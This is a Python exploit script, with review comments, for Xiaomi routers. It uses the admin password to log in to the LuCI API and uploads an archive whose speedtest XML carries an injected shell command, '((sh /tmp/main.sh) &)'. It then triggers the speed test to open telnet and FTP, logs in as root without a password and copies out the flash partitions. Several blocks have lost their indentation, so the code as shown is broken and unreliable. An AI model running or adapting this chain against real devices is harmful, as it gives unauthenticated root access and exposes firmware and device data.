import os
import sys
import re
import time
import base64
import random
import hashlib
import requests
import socket
import subprocess
import tarfile
import ftplib
import telnetlib
# proxies = {"http":"http://127.0.0.1:8080"}
# Optional HTTP proxy applied to every requests call below; an empty dict means a
# direct connection (the commented line shows the usual local intercepting proxy).
proxies = {}
# Shell command string that is substituted into the speedtest URL template's
# {command} placeholder further down; it launches /tmp/main.sh detached in the background.
command = "((sh /tmp/main.sh) &)"
# Windows-only gateway discovery: run tracert through cmd.exe with a one-hop limit and
# take the fifth output line (index 4), which is assumed to describe the first hop.
# `chcp 437` presumably forces an ASCII console code page so the output decodes and
# splits cleanly on "\r\n" -- TODO confirm on non-English Windows installs.
# NOTE(review): although argv is a list, `cmd /c ... & ...` re-introduces shell parsing;
# all arguments are fixed literals here, so nothing untrusted reaches that shell.
line4 = subprocess.check_output(["cmd","/c","chcp","437","&","tracert","-d","-h","1","1.1.1.1"]).decode().split("\r\n")[4].strip().split(" ")
# The first space-separated token made of four dot-separated parts is taken as the
# router's address; no further validation (e.g. numeric octets) is performed.
for data in line4:
if len(data.split(".")) == 4:
router_ip_address = data
break
# NOTE(review): if no token matches, router_ip_address is never bound and the first
# use inside get_mac() fails with NameError instead of a clear diagnostic.
def get_mac():
"""Fetch the router's web UI landing page and return its advertised device id.

Returns:
    The value of the ``deviceId`` JavaScript variable found in the page body; it
    is used as the device identifier when building the login nonce.

Terminates the process with exit status 1 when the HTTP request fails.
"""
try:
# Plain-HTTP GET against the LuCI web entry point; router_ip_address is the
# module-level gateway address discovered above.
r0 = requests.get("http://{router_ip_address}/cgi-bin/luci/web".format(router_ip_address=router_ip_address), proxies=proxies)
except:
# NOTE(review): a bare except also swallows KeyboardInterrupt and SystemExit;
# `except requests.RequestException:` is the intended scope.
print ('No Xiaomi Router found ... Check the router performance and try again.')
sys.exit(1)
# NOTE(review): indexing [0] raises IndexError when the page carries no deviceId
# (e.g. a non-Xiaomi gateway that still answers HTTP), bypassing the message above.
mac = re.findall(r'deviceId = \'(.*?)\'', r0.text)[0]
return mac
def create_nonce(mac):
    """Build the client-side login nonce ``"<type>_<mac>_<unix time>_<random>"``.

    Args:
        mac: Device identifier returned by get_mac(); embedded verbatim.

    Returns:
        A string of four underscore-separated fields: the literal type ``0``,
        ``mac``, the current Unix time in whole seconds and a random integer
        in ``[0, 10000]``.
    """
    kind = 0
    stamp = int(time.time())
    # random (not secrets) is what the original uses; the value only has to vary
    # per login attempt, it is not a security token.
    salt = random.randint(0, 10000)
    return f"{kind}_{mac}_{stamp}_{salt}"
def calc_password(nonce, account_str):
    """Return the hex SHA-1 digest of ``nonce + account_str`` (UTF-8 encoded).

    This mirrors the digest format the router's login endpoint expects; it is a
    protocol step, not a general-purpose password hash.

    Args:
        nonce: Prefix string (the login nonce, or the raw password in the first round).
        account_str: Suffix string appended before hashing.

    Returns:
        40-character lowercase hexadecimal digest.
    """
    material = (nonce + account_str).encode("utf-8")
    return hashlib.sha1(material).hexdigest()
# --- Authenticate to the router's web API --------------------------------------
mac = get_mac()
nonce = create_nonce(mac)
# calc_password() returns sha1(first + second), so this is sha1(password + fixed
# string): the constant is a fixed suffix applied to every password, not a
# per-user salt. The password is read interactively and never written anywhere.
account_str = calc_password(input("Enter your router password: "), 'a2ffa5c9be07488bbb04a3a47d3c5f6a')
# Second round binds the hashed password to this attempt's nonce.
password = calc_password(nonce, account_str)
# Form body assembled by plain string formatting with no URL-encoding; password is
# hex and the nonce is digits/underscores plus the device id, so this assumes the
# device id contains no reserved characters -- TODO confirm.
data = "username=admin&password={password}&logtype=2&nonce={nonce}".format(password=password,nonce=nonce)
# Credentials travel over plain HTTP to the LAN gateway; anyone on the path can
# observe the hashed credential and the nonce.
r2 = requests.post("http://{router_ip_address}/cgi-bin/luci/api/xqsystem/login".format(router_ip_address=router_ip_address),
data = data,
headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"},
proxies=proxies)
# Session token ("stok") extracted from the JSON reply with a regex.
# NOTE(review): neither r2.status_code nor the reply's error field is checked, so a
# wrong password surfaces here as IndexError rather than a readable message.
stok = re.findall(r'"token":"(.*?)"',r2.text)[0]
# --- Render and upload the payload archive --------------------------------------
# The template in the repo's template/ directory carries {router_ip_address} and
# {command} placeholders that str.format fills in below.
with open("template/speedtest_urls_template.xml","rt") as f:
template = f.read()
data = template.format(router_ip_address=router_ip_address,command=command)
# newline='\n' keeps Unix line endings even when this script runs on Windows.
with open("main/speedtest_urls.xml",'wt',newline='\n') as f:
f.write(data)
# The archive holds the rendered XML plus main.sh and a busybox binary taken from
# main/; each entry is stored under its bare filename (second tar.add argument).
with tarfile.open("main/payload.tar.gz", "w:gz") as tar:
tar.add("main/speedtest_urls.xml", "speedtest_urls.xml")
tar.add("main/main.sh", "main.sh")
tar.add("main/busybox", "busybox")
os.remove("main/speedtest_urls.xml")
print("Uploading the exploit...")
# Multipart POST to the c_upload endpoint, authorised by the stok in the URL path.
# NOTE(review): the file object passed in files= is never closed explicitly; it is
# only released when CPython's refcounting drops the temporary dict, which is what
# lets the os.remove() below succeed. Wrap the request in `with open(...) as fh:`
# to make that explicit. r3 is not inspected, so an upload failure goes unnoticed.
r3 = requests.post("http://{router_ip_address}/cgi-bin/luci/;stok={stok}/api/misystem/c_upload".format(router_ip_address=router_ip_address,stok=stok), files={"image":open("main/payload.tar.gz",'rb')}, proxies=proxies)
os.remove("main/payload.tar.gz")
print("Enabling telnet and ftpd...")
# Requesting the netspeed endpoint starts the router's speed test; per the messages
# around it, this is the step after which telnet and FTP become reachable. The
# mechanism (the uploaded speedtest_urls.xml being consumed by that test) is
# inferred from the filenames and is not shown on this page.
# NOTE(review): r4 is never inspected, so "Successfully!" is printed unconditionally.
r4 = requests.get("http://{router_ip_address}/cgi-bin/luci/;stok={stok}/api/xqnetdetect/netspeed".format(router_ip_address=router_ip_address,stok=stok), proxies=proxies)
print("Successfully!")
print('Creating a backup...')
# Telnet in as root; no password is ever sent, so the service is assumed to accept a
# bare login. The shell prompt is used as a synchronisation marker after each command.
# NOTE(review): telnetlib is deprecated since Python 3.11 and removed in 3.13
# (PEP 594); every read_until() here blocks indefinitely because no timeout is given.
tn = telnetlib.Telnet(router_ip_address)
tn.read_until(b"login:")
tn.write(b"root\n")
tn.read_until(b"root@XiaoQiang:~#")
# Dump the mtd0 flash partition to a temporary file on the device.
tn.write(b"dd if=/dev/mtd0 of=/tmp/backup.bin\n")
tn.read_until(b"root@XiaoQiang:~#")
# Retrieve the dump over FTP into data/ on the local machine.
# NOTE(review): no ftp.login() is called, so this relies on the device's ftpd
# accepting transfers without authentication -- confirm. Like the telnet session,
# the transfer is plaintext; the f-string has no placeholders and could be a plain literal.
ftp=ftplib.FTP(router_ip_address)
with open('data/backup.bin', 'wb') as file:
ftp.retrbinary(f'RETR /tmp/backup.bin', file.write)
# Remove the temporary dump from the device.
tn.write(b"rm /tmp/backup.bin\n")
tn.read_until(b"root@XiaoQiang:~#")
# NOTE(review): neither tn.close() nor ftp.quit() is called; both sessions stay open.
print('Backup created!')
print('backup eeprom...')
# Same sequence as the backup above, this time for the mtd3 partition (labelled
# "eeprom" by the surrounding messages).
# NOTE(review): a second Telnet and FTP session is opened while the previous ones are
# still connected and never closed; the duplicated block is a natural candidate for a
# helper such as backup_partition(mtd_device, local_path) that closes its sessions.
tn = telnetlib.Telnet(router_ip_address)
tn.read_until(b"login:")
tn.write(b"root\n")
tn.read_until(b"root@XiaoQiang:~#")
# Dump the mtd3 partition to a temporary file on the device.
tn.write(b"dd if=/dev/mtd3 of=/tmp/eeprom.bin\n")
tn.read_until(b"root@XiaoQiang:~#")
# Retrieve it over FTP (again without ftp.login(); see the note on the first backup).
ftp=ftplib.FTP(router_ip_address)
with open('data/eeprom.bin', 'wb') as file:
ftp.retrbinary(f'RETR /tmp/eeprom.bin', file.write)
# Remove the temporary dump from the device.
tn.write(b"rm /tmp/eeprom.bin\n")
tn.read_until(b"root@XiaoQiang:~#")
print('eeprom backuped!')